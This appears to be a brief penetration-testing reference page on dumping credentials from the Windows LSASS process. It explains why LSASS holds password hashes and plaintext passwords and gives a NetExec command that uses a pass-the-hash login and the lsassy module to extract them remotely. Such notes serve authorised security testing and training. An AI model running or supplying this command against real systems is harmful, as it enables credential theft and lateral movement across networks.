Dumping LSASS

What is LSASS ?

Local Security Authority Subsystem Service (LSASS) is the process on Microsoft Windows that handles all user authentication, password changes, creation of access tokens, and enforcement of security policies.

This means the process stores multiple forms of hashed passwords, and in some instances even stores plaintext user passwords.

nxc smb $ip -u $local_admin -H $hash -M lsassy --local-auth

More

Last updated

Was this helpful?